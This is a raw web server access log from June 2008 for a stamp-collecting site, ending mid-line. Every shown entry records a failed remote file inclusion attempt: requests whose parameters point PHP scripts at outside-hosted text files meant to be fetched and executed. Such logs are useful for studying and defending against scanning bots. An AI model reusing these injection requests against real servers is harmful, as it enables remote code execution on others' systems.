74.54.22.2 - - [15/Jun/2008:22:45:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
74.54.22.2 - - [15/Jun/2008:22:45:02 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:11 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:12 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:12 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:17 -0700] "GET /logs/scripts.log/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:17 -0700] "GET /infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:22:45:18 -0700] "GET /logs/infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:47:40 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:47:40 -0700] "GET /send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:47:41 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:47:53 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:47:53 -0700] "GET /send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:22:47:53 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:47:57 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:47:57 -0700] "GET /send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.115.47 - - [15/Jun/2008:22:47:58 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.86.5.10 - - [15/Jun/2008:22:48:02 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
70.86.5.10 - - [15/Jun/2008:22:48:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:48:04 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:48:04 -0700] "GET /send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [15/Jun/2008:22:48:05 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:49:51 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:49:52 -0700] "GET /send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.25.221.108 - - [15/Jun/2008:22:49:52 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:22:50:12 -0700] "GET /logs/access_080428.log/send_reminde